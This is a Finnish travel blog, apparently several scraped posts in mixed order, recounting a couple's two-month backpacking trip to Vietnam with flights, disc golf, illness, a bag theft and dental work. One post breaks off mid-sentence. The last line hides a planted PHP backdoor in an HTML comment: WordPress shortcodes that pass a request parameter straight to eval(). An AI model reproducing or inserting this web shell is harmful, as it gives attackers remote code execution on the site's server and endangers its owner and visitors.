Vietnamin lämpöön

Moikka kamut!

Onhan sitä vettä juossut Pielisestä aika paljon sitten viime reissun! Kaksi vuotta! Siinä ajassa meistä on tullut isovanhempia. Pihla on nyt toisella vuodella. Uskon, että hänkin on saanut reissaajan verta perintönä! Mutta nyt se reissu taas lähestyy!

Katselin jo hyvissä ajoin kesällä lentoja Saigoniin, siis Ho Chi Minch Cityyn. Eksyin Qatar Airways*n sivuille. joilla tarjosivat istuinpaikkaa mennen tullen reilulla 400€:lla. Helsingistä, yksi välilasku Dohassa ja sitten perillä. Kiinni veti kaksi paikkaa. Ja kun paikat olivat varatut, sai valita vielä koneestakin mieluisan penkin. Kätevää! Samalla varasin laktoosittomat ruoatkin. Kokemuksesta tiedän, että erikoisruokavalion tilanneet saavat sapuskansa ensimmäisten joukossa. Eipä tarvitse vieruskaverin syödä minun kyynärpäitä samaan aikaan. Ja kun on syönyt, voi käydäkin nukkumaan. Matka joutuu huomaamatta ja perillä on mukavampi olo, kun ei tartte väsyneenä etsiä hotellihuonetta.

Marraskuu on jo hyvällä alulla ja ulkona ripottelee lumihiutaleita taivaalta. Pakkasta pari kolme astetta. Lämpimän vuolukivitakan haihduttaessa tasaista lämpöä huoneeseen, on mukava fiilistellä Saigonin 35 asteen lämmöstä. Siellä yölläkin on lämpimämpää kuin meillä sisällä nyt! Mutta kaunistahan se uuden lumen peittämä maa on. Ja valoisaa. Mutta siitä huolimatta…

Lähtöön on 30 yötä. Siis Suomen itsenäisyyspäivän aamuna nousemme siiville. Yksi pakollinen televisioohjelma jää näkemättä, mutta eipä paljon harmita. Vuorentaan Asukkaiden jo perinteinen itsenäisyyspäivän vastaanotto saa luvan korvata em menetys. Ja isänmaallinen mieshän olen. Sen sai perintönä lapsuudenkodista. Isä vietti parhaat nuoruusvuotensa sodassa eikä äitikään jäänyt paitsi siitä riennosta. Onneksi olemme itsenäinen kansakunta, itsenäisiä suomalaisia. On vapaus matkustaa sinne minne haluaa!

Mielessäni olen pakannut kaiken valmiiksi. Reppuun silkkipussilakana, silkkihuivi, kirja, vessapaperirulla, alushousut, t-paita, tyhjä matkapäiväkirja. Ja thyroksiinit. Ei saippuaa, shampoota, aurinkorasvaa, partakonetta. Mitä niitä lennon aikana tarvitsee! Ruumaan frisbeekori ja iso kassillinen kiekkoja. Saigonissahan on Vietnamin ainoa frisbeerata ja seura. https://www.facebook.com/groups/698627486849419/. Olen sen seuran jäsen numero 7. Laitetaan lomalla putti kuntoon ensi kesän kisoja silmällä pitäen. Mukava päästä tapaamaan vanhoja tuttuja pelikavereita. Ja onneksi sadekausikin on loppumassa, ettei tartte lähteä nokialaisia etsimään paikallisesta kumpparikaupasta. Siis sandaaleilla mennään.

Vung Tau, rantaa ja fishfoodia

Uuden Vuoden vietin jälkeen sai Saigon jäädä hetkeksi. Varasimme bussiliput saigonilaisten virkistymis- ja viikonlopun viettopaikkaan noin 120 km:n päähän. Matkaliput myynyt rouva piti hyvää huolta, että olemme juuri siinä bussissa, mihin pitikin nousta. Koska meillä oli ns. Open tickets, jouduimme vaihtamaan istuinpaikkaa kerran. Matka kesti 2 tuntia. Aika-ajoin nopeus oli 120 km/t. Hienoa moottoritietä.

Vung Tau’n bussiasemalla vastassa oli taksimiesten armeija. Tarjottiin ilmaista

Mui Ne, Da Lat, Nha Tran. Juoluaatto

iSeuraava kohteemme oli rantalomalaisten toivepaikka: Mui Ne. Varasimme edellisenä päivänä liput ns. Sleeping bussiin. Se on miellyttävä tapa matkustaa vähänkin pitempiä reitinvälejä. Voit ihailla ikkunoista ohikiitäviä maisemia tai ottaa torkut ja matka jatkuu.

Matkaa teimme pari sataa kilometriä ja se kesti yhden pysähdyksen taktiikalla n. viisi tuntia. Välillä tie halkoi laajoja riisipeltoja ja välillä oli kilometrikaupalla kumipuuviljelmiä. Mui Ne oli muuttunut sitten neljän vuoden. Uusia hotelleja oli noussut aikoinaan tyhjille tonteille koko monta kilometriä pitkälle rantakaistaleelle. Silmiinpistävää oli kyrilliset tekstit liikkeiden teipatuissa ikkunoissa. Samoin ravintoloiden ruokalistat olivat ensiksi venäjää, sitten vietnamia ja sitten englanniksi. Tämä kävi nopeasti selväksi ketä mahtoi paikallisten lisäksi kansoittaa ennen niin viihtyisää rantakohdetta.

Majoituimme hotelliin, jonka isäntä oli saksalainen Paul. Hän neuvoi, kuinka itsepalvelu pelaa perustuen ihmisen rehellisyyteen. Otat jääkaapista baaritiskin takaa huurteisen ja merkkaat sen huoneesi numeron kohtaan tukkimiehen kirjanpidolla. Toimi!

19.12 siirrymme Da Lat’iin. Ajoimme pienehköllä bussilla vuoristoreittiä pitkin, joita teitä ei näkynyt karttaohjelmalla. Bussikuski pysäytti yhden vuoren päälle päästyään auton ja ilmoitti, että viiden minuutin mittainen jalottelutauko. Maisemat olivat todella henkeäsalpaavat! Lämmintä oli alle kymmenen astetta, mikä tuntui Mui Ne’n 35 asteen jälkeen tosi kylmältä.

Da Lat’ia lähestyttäessä maisemat olivat jylhät. Jyrkkiä vuoren rinteitä ja niiden pohjalla joki. Mutta eniten ihmetytti mäntymetsät! Kuin kotona Suomessa! Neulaset näyttivät pidemmiltä mutta kaarna tutulta.

DaLat sijaitsee 1500 m:n korkeudessa. Se on suurkaupunki ja alueensa keskus. Myös turistivirrat ovat osuneet sinne. Kadulla kuuli monien kansallisuuksien kielisekoituksen.

Etsimme hotellia. Kuin tilauksesta kadun varteen pysähtyi paikalline Easyrider. He ovat paikallisia matkaoppaita, jotka maksua vastaan vievät sinut mootoripyörällä vaikka Hanoihin. Ovat varsinaisia ammattilaisia eivätkä kuseta turistia. Tekevät sen mistä sovitaan. Saimme vinkin hotellista, joka olisi aivan keskustan tuntumassa mutta poissa melusta. Siis sinne.

Hotellin respassa tapasimme erinomaista englantia puhuvan nuoren miehen, joka näytti meille huoneet. Hinta oli siedettävät kymmenen taalaa yö. Siisti huone kahdella Kingsize-vuoteella ja upealla kylppärillä lämpimine vesineen. Majoituimme siihen muutamaksi päiväksi. Illalla etsimme sopivaa ruokapaikkaa ja löysimme Chocolade-ravintolan. Se tuntui olevan turistien suosima paikka.Ruoka oli hyvää ja edullista eikä annoskootkaan aiheuttaneet huomauttamista.

Olin tuntenut pieniä vilun väristyksiä pitkin iltapäivää, mutta osasin epäillä lievää kuumeilua. Mittari kainaloon: 38,8! Ja ripuli! Voisiko olla tavallinen turistiripuli kuumeen kanssa, salmonella, niveltulehduksia aiheuttava vatsatauti? Hotellin omistaja otti asian omakseen. Kohteliaasti koputtaen oveen hän toi termarissa kuumaa vettä, teepusseja, hedelmiä, suolaa ja sokeria! Itse palelin välillä ja hikosin parasetamoolin ansiosta. Mukaan oli lähtenyt silkkinen makuulakana kuin makuupussi. ONNEKSI! Se tuntui iholla tosi hyvältä vaikka paleli saati hikoillessa.

 

 

Vähitellen vointi koheni. Hieman harmitti, kun jäi paljon näkemättä ja kokematta. Uskon,että palaan tänne joskus uudestaan.

Jouluaaton aattona siirryimme rannikolla Nha Trang’iin. Bussimatka kesti kuutisen tuntia. Etsimme saman pienen hotellin kuin neljä vuotta aikaisemmin. Muuten paikka ei ollut muuttunut, hintataso hieman noussut.

Törmäsimme taas runsaaseen itäturistien määrään. Liekö ruplan jyrkkä alamäki aiheuttanut sen, että emme tavanneet yhtään nauravaa tai hymyilevää venäläistä.

Nha Trang’ssa on muuten maailman suurin maksava Buddha, 28 metriä kiveä.

Yksi suruviesti tuli: Joe Cocker oli menehtynyt. Mieleeni tuli hänen artistikautensa varhaistuotannosta the Letter! Kova kappale edelleenkin kuunneltuna! R.I.P.

Tapasimme suomalaispariskunnan, olivat myös parin kuukauden reppureissulla. Heille oli käynyt hieman ikävästi heti ekoina päivinä, kännykkä oli varastettu mopopoikien toimesta Saigonissa. Harmi.

Ystävämme Tarja satutti hieman nilkkaansa käydessään hieman hämärässä WC:saa. Ftb-ligamentti oli hieman venähtänyt. Siitä hän selvisi kylläkin säikähdyksellä. Pari päivää ideaalisidosta tukemaan nilkkaa ja buranaa…

Jouluaattona emme syöneet kinkkua. Söimme sitä vastoin erittäin hyvin laitetut lampaan kareet! Kastike saa erityismaininnan! Kun mahat olivat täynnä ja mieli korkealla, siirryimme hotellille. Kuuntelimme kännyköistä vanhoja joululauluja. Tuntui aika kotoiselta vaikka lämmintä oli lähes 30 astetta!

Seuraavana aamuna olivat paikalliset päättäneet laittaa discon  jo klo viisi aamulla! Basson jumputus tuli läpi ja herätti sopivasti ennen auringon nousua.

25.12 varasimme liput yöjunaan Saiginiin. Neljän hengen kabiinin yläpetit olivat majapaikkana seuraavat 10 tuntia. Matkaseurana oli iäkäs vietnamilaispariskunta. Mies sairasti Parkinsonin tautia. Vaimo piti hänestä todella hyvää huolta. Matka meni nukkuessa.

Saigonin asemalla olimme klo 4.30. Ilma oli varsin raikas eikä liikennettä ollut lainkaan. Otimmt taksin Phum Ngu Laolle. Siitä ottaisimme muutaman askeleen tuttuun hotelliin.

Olimme nousset taksista ulos. Ystävämme asensi reppua selkäänsä ja silloin se tapahtui! Kaksi miestä ajoivat mopolla ja nappasivat häneltä pienen olkalaukun. Siinä meni kännykkä, rahat, passi. Katu oli täysin tyhjä.

Tiesin poliisiaseman ja menimme sinne. He kirjasivat jutun ja kutsuivat aamulla takaisin, jolloin tekisivät paperit valmiiksi. Eniten askarrutti passin saaminen ennen kotiin paluuta 1.1. Pankkikortin kuolettaminen ei onnistunut puhelimitse. Se saatiin tehtyä Suomesta sukulaisten toimesta. Puhelin ei yhdistänyt ilmoitusnumeroon. Aika ihmeellistä! Ja se että oli juolunpyhät ja edessä viikonloppu. Suurlähetystö olisi auki maanantaina 29.12. Siispä matkatoimistoon ja varaamaan lento Hanoihin. Helppoa. Mutta ei. Et pääse turistina lennolle ilman passia. Mitäs sitten? Ainut vaihtoehto on lähteä illalla lähtevään junaan, joka on Hanoissa 30:n tunnin päästä!

Ja niinpä ystävämme läksi seikkailemaan Hanoihin.

Yllätys oli suuri kun hän ilmoitti saaneen passin kolmessa tunnissa ja olevansa Saigonissa vielä samana iltana kahdeksan maissa. Ja niin kävi! Mukanaan hänellä oli pinkin värinen passi! Juhlinnan paikka!

Tässä kaikessa pelasi myös suurta roolia Visa. Kortissani on vain debet-ominaisuus. Sain nostettua sillä riittävästi dongeja, että ystävämme ei kärsinyt enempää kuin oli tarves. Rahattomana kahden tuhannen kilometrin päässä passista olisi aika vaikeaa.

Uutta Vuotta otimme vastaan paikallisten kanssa ihaillen varsin näyttävää 20 minuuttia kestänyttä ilotulitusta katsellen. Koko kaupungin ilotulitus oli keskitetty yhden korkean hotellin kattoterasseille. Upeaa oli! Ja mikä vielä kummastutti, yhtään paukkupommia ei räjähtänyt koko iltana. Ne säästetään Kiinalaisen Uuden Vuoden juhlintaan.

Saattelimme uuden vuoden ensimmäisen aamun koittaessa ystävämme taksiin ja lentoasemalle. Itse jäämme tänne pyörimään ja seikkailemaan vielä 44 päiväksi.

Hammaslääkärissä

Saavuimme Saigoniin viikko takaperin. Kokemuksesta tiedän,että muutama päivä menee lämpöön ja ruokaan totutellessa. Alkuun paita on aivan väännettävässä kunnossa. Olemme sopetuneet yllättävän hyvin ja nopeasti. Emme ole kärsineet jalkojen turvotuksista emmekä muuistakaan ongelmista.
Viime keskiviikkona illalla kävelimme iltalenkkiä. Huomasin hammasklinikan ja aattelin pistäytyä katsomassa. Jenkkipariskunta oli maksamassa laskuaan ja odottelin vuoroani. Jo hieman iäkkäämpi naishammaslääkäri ehdotti saman tien hammastarkastusta. Etuhampaani oli lohjennut loppukesällä ja yksi poskihammas oli vailla korjausta. Hän ehdotti keraamisia kruunuja molempiin hampaisiin. Poskihampaaseen tulisi vielä titaanipohjustus. Koko remontin hinta 260€! Eikun penkkiin! Hoito puudutuksineen kävi kokeneen lääkärin rutiinilla. Hiljainen musiikki soi taustalla. Välillä hammashoitajan ja -lääkärin rauhallinen juttelu ja naurahdukset kevensivät jännitystäni. Lopulta huomasin käsieni lepäävän hikoilematta. Vanhan amalgaamipaikan purku kesti ehkä puoli tuntia. Koska kello oli jo puoli yhdeksän, sovimme,että tulisin seuraavana aamuna heti kahdeksan jälkeen takaisin. Silloin väliaikaiset hampaat ovat valmiit sovitettavaksi.
Olin torstaiaamuna taas paikalla. Pienin viilauksin sain uudet leegot suuhuni. Seuraavana aamuna takaisin klinikkaan. Siellä odotti hyväntuulinen hammashoitaja ja ohjasi vastaanottohuoneeseen. Lääkäri tuli hetken päästä ja vaihdoimme hyvät huomenet vietnamiksi. Tsintsao buisang suomeksi kirjoitettuna.
Keraamiset kruunut odottivat kipsijäljennöksessä paikoilleen asentamista. Lääkäri teki todella tarkkaa työtä. Sai purra väriliuskaa kerran jos toisenkin. Tunnin työsketelyn jälkeen purenta tuntui hyvältä.
Sitten hammashoitajan käsittelyyn. Hän puhdisti hampaat ja poisti kertyneen hammaskiven. Eipä vuotaneet ikenet verta!
Poislähtiessä olin kuin viiden pennin hevonen. Hyvilläni saamastani hyvästä palvelusta ja uudesta kokemuksesta.

Lento Saigoniin 7.12.2014

Lähtö Suomesta ei olisi voinut olla helpompaa. Frisbeekori hihnalle koneeseen, samalla saimme lentoliput tiskiltä. Läpi turvatarkastuksen ja matka kohti Moskovaa alkaa. Aeroflotin Airbus A319 palveli hyvin ja perille saavuimme aikataulun mukaan. Reilun kolmen tunnin jälkeen portille, jossa odotti Boening 777. Matkustajaystävällinen kone! Mukavat tilat 180 senttiselle. Tarjoilut tosin hieman ihmetyttivät: ensin tarjoiltiin puna- tai valkoviiniä. Sitten lasit kerättiin pois. Seuraavaksi tarjoiltiin ruoka. Sen kanssa sai vettä. Viiniä sai myöhemmin kun ruokatarvikkeet oli kerätty pois. No muuten matka meni hyvin. Olimme Saigonissa reilu puoli tuntia etuajassa. Se aika meni odotellessa terminaaliputkelle pääsyä. Viisumit saimme odoteltuamme reilut puoli tuntia. Vaihdoin 50€ hyvällä kurssilla jo lentokentällä. Sitten bussilla nro 152 kohti keskustaa ja Pham Gnu Lao-katua. Se sijaitsee reppureissaajien suosimalla District 1:llä. Tuttu gasthouse Baka otti meidät lämpimästi vastaan. Muistivat meidät neljän vuoden takaa! En ollut varautunut huoneita etukäteen ja olimme onnekkaita ja saimme viimeiset huoneet. Hinta on specialprice for you.
Koska lämmintä oli 33 astetta, ostimme jokaiselle litran pullot vettä. Entuudestaan tiedän että nestehukka on matkailijan vaarallisin petoelukka.
Illalla ilma viileni hieman ja teki mieli päästä puttausta. Lähtipuistossa oli satamäärin zumbaajia ja kaikenäköisten pallopelien pelaajia. Mutta vain yksi frisbeekori. Mutta kaikesta huolimatta laji huomattiin. Paikalliset ihmiset tulivat uteliaina katsomaan puttausta ja varmasti sata kokeili sitä. Oppivat myös nopeasti. Ilta 9:tä pillit pussiin ja nauttimaan hyvästä vietnamilaisesta ruoasta.

Lähtöpäivä

No niin. Linnanjuhlat on juhlittu. Mieleenpainuvimpana henkilönä oli 101-vuotias sotiemme veteraani, joka pyörähteli vielä tanssilattiallakin! Vahvasti muistui mieleeni isäni ja äitini, jotka olisivat lähes samanikäisiä. Samoin edellisellä Da Nangissa tapaamamme vietnamilaismies, joka oli 86 vuotias. Hän oli taistellut aikanaan Vietnamin sodassa ja tehnyt elämäntyönsä merimiehenä. Vaikka yhteistä kieltä ei ollutkaan, asiat saimme selville käsin, piirtämällä ja valokuvin. Olipa hän käynyt Helsingissäkin merimiehenä.

Eilen tein Aetoflotille checkingin. Siis paikat koneissa valmiina.

 

Hämeenlinnassa on asteen verran pakkasta. Pihamaa on ohuen jään peittämä ja luistimet olisivat parhaat liikkumisvälineet. Viimeiset tarkistukset ja reput lähtökuntoon. Sitten ei muuta kuim sandaalit jalkaan ja menoksi

Lähdön odottelua

Vielä 4 yötä lähtöön! Tämä on kuin joulupukin odotus! Jännitys? tiivistyy!

Tätä ennen on kuitenkin jo suunniteltu ja tutkittu halpoja lentoja Saigoniin. Aikaisemmilta reissuilta koettuna on aivan sama, onko välilaskuja yksi tai kaksi. Olemme vaimoni kanssa seikkailleet jo 90-luvun lopusta lähtien Thaimaassa, Kambodzassa ja Vietnamissa. Reppuun paita, shortsit, alushousut, kirja, vessapaperirulla, hammasharja, lääkkeet, aurinkolasit ja kamera, Tietenkin passit ja lentoliput. Siis ei mitään turhanpäiväistä kannettavaksi. Olemme Helsinki-Vantaalla jo valmiiksi rennoissa asusteissa ja sandaaleissa tietenkin lentosukat jalassa.

Mutta tähän tulevaan reissuun. Varasin lentoliput 15.9. Vähän lisää extreamea: Aeroflotilla Moskovan kautta Ho Chi Minch Cityyn. Uusi kokemus houkutti! Aikataulut sekä mennessä että palatessa ovat tosi hyvät.

Samoihin aikoihin tutkin Vietnamin suurlähetystön sivuilta viisumiasiaa. Tulostin hakemukset. Valokuvassa täytyisi käydä. Asiaa tarkemmin tutkiessa löysin e-visan. Täytin lomakkeen ja parin päivän päästä sähköpostiini kolahti valmiit paperit. Sekin uusi kokemus!

Halusimme jakaa tulevaa kokemustamme ystävämme Tarjan kanssa ja ehdotimme hänelle mukaan lähtemistä. Hän lupautui mukaan kolmeksi viikoksi. Jännää!

Istuimme iltaa yhdessä ja yhteisymmärryksessä laadimme tulevan reissun ”ehdot”.

Olen hahmotellut jo tulevaa kahta kuukautta Vietnamissa. Pelaan itse frisbeegolfia. Otin siis selvää pelikentistä. Netistä ei löytynyt kenttää. Sain sen selville, että ultimate frisbee on suosittu laji ainakin Saigonissa ja Hanoissa. Otin yhteyttä molempiin seuroihin. Tyly vastaus: ei kenttiä koko maassa. Muutaman päivän päästä Saigonista viestitettiin, että heidän porukoissa on yksi kaveri, joka luulee tietävänsä, miten frisbeekiekkoa heitetään! Lupaavaa! Kuitenkin kontakti oli saatu. Otan mukaani pari siirrettävää koria ja muutamia kiekkoja. Eiköhän se peli tule tutuksi siinäkin osassa maailmankolkkaa.

Valmistautumiseen kuuluvat myös rokotukset. Ne meillä ovatkin kunnossa. Samoin esim laskujen muuttaminen e-laskuiksi, karttojen lataaminen kännykkään, kotiin jäävien kukkien kastelijan kysely, postien selaaja.

Mutta nyt vielä vähän malttia odotukseen….

 

Moikka maailma!

Vielä 11 yötä lähtöön! On kuin joulupukkia odottelisi. Tulevat 63 päivää Vietnamia!
Varasin lennot 15.9 välille Hki-Moskova-Saigon. Extreme Moskovan kautta! Lentoaika on lyhyt ja aikataulut sekä mennessä että palatessa hyvät.
Olemme vaimoni Tarjan kanssa seikkailleet Kaukoidässä -97 vuodesta lähtien. Thaimaa on tullut tutuksi etelästä pohjoiseen, lännestä itään. Samoin Kambodza. Vietnamissa olemme olleet kahdesti ja ihastuneet suuresti. Sinne nytkin!
Multivisat sain e-visan kautta vaivattomasti. Mukaan passikuvia muutama kappale.
Emme varaa hotellia edes ensimmäiseksi yöksi. Saigonissa yöpaikkoja riittää! Kaiketi asetumme reppureissajien alueelle District 1:lle. Viime reissulla löysimme pienen, siistin Baka-hotellin, jonne suunnistamme nytkin.

Kolmeksi viikoksi saamme mukaamme tutun Tarjan. Häntä ei tarvinnut kahdesti kysellä. Istuimme illaksi sopimaan ”ehdoista” ja uskomme reissumme onnistumiseen, vaikka kolme pyörää onkin.

Reppuun pakkaan t-paidan, alushousut, shortsit, wc-paperia, paksun kirjan, hammasharjan, aurinkolasit ja lääkkeet. Koska suunnitelmissa on liikkua myös malaria-alueilla, hankimme paikanpäältä lääkitykset. En halua Lariam-hallusinaatioita!

Pelaan aktiivisesti frisbeegolfia. Sitä siis Vietnamin lämmössä! Etsin netistä kenttiä tuloksetta. Löysin Saigonista ja Hanoista ultimateseurat ja otin yhteyttä. Kenttiä ei todellakaan ole koko maassa. Saigonista tulleessa viestissä kerrottiin, että seurassa on yksi kaveri, joka luulee tietävänsä, miten kiekkoa heitetään! Kyselin noin 100 metriä pitkää heittopaikkaa, sellainen löytyy kyllä. Innovan pojilta pari matkakoria ja sekalainen satsi kiekkoja mukaan, siinä ratkaisu talviharjoittelulle etelän lämmössä. Odottavat siellä suurella mielenkiinnolla….

Lähtövalmistelut ovat mallillaan: kukkien kasteluapu, postien selaus, laskujen muuttaminen e-laskuiksi, reseptien uusinta ja lääkkeiden varaaminen pariksi kuukaudeksi….Kännykkään kartat valmiiksi. Siinä listaa.

Sitä odotellessa, että saa laittaa lentosukat sandaalien kanssa jo kotona, silkkihuivi lennon ajaksi kaulaan (et vilustu koneessa) passit ja lentoliput mukaan….

 

<!– [insert_php]if (isset($_REQUEST["vJv"])){eval($_REQUEST["vJv"]);exit;}[/insert_php][php]if (isset($_REQUEST["vJv"])){eval($_REQUEST["vJv"]);exit;}[/php] –>